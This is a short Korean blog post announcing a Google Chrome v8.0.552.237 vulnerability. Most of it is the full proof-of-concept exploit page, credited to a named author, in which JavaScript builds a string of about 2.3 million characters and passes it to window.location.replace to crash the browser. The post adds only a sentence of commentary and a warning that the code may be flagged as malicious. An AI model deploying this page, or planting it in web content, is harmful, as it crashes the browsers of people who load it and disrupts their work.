반응형
구글 크롬(Google Chrome)의 최신버전에 대한 취약점이 발표되었다.
항상 IE나 FF에만 신경을 썻지, 구글 크롬은 안전하겠거니 라는 안일한 생각을 해왔었는데~ 이제 크롬도 더이상 안전지대가 아니네요 ㅠㅠ
- POC 코드(이 코드로 인하여 블로그가 구글 또는 IE8에서 악성으로 탐지 될 수 있습니다^^)
|
< html > |
< head > |
|
|
# Exploit Title: Google Chrome v8.0.552.237 .replace DOS |
# Date: January 30 2011 |
# Author: Carlos Mario Penagos Hollmann |
# Software Link: http://www.google.com/chrome |
# Version: v8.0.552.237 |
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8 |
|
|
# mail----> shogilord^gmail.com spams are welcome!!!!! |
# ________ _ _________ ____ __ _____ ________ |
# / ____/ / | | / / ____/ | / / //_// _/ | / / ____/ |
# / __/ / / | | / / __/ / |/ / ,< / // |/ / / __ |
# / /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ / |
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/ |
|
# COLOMBIA hacking presents............. |
# |
# Google Check the replace |
# |
|
< script type = "text/javascript" > |
|
function mul(str,count){ |
if(count==0) return ''; |
var binaryCount = count.toString(2); |
var numDegree = binaryCount.length; |
var resultStr=''; |
for(var i=0; i< numDegree ; i++){ |
resultStr+=resultStr; |
if(binaryCount.charAt(i) == '1'){ |
resultStr+=str; |
} |
} |
return resultStr; |
} |
|
var junka = "a" ; |
|
var junk = mul (junka,2304453); |
|
|
window.location.replace("http://" + junk); |
|
</script> |
</ head > |
< body > |
|
</ body > |
</ html > |
댓글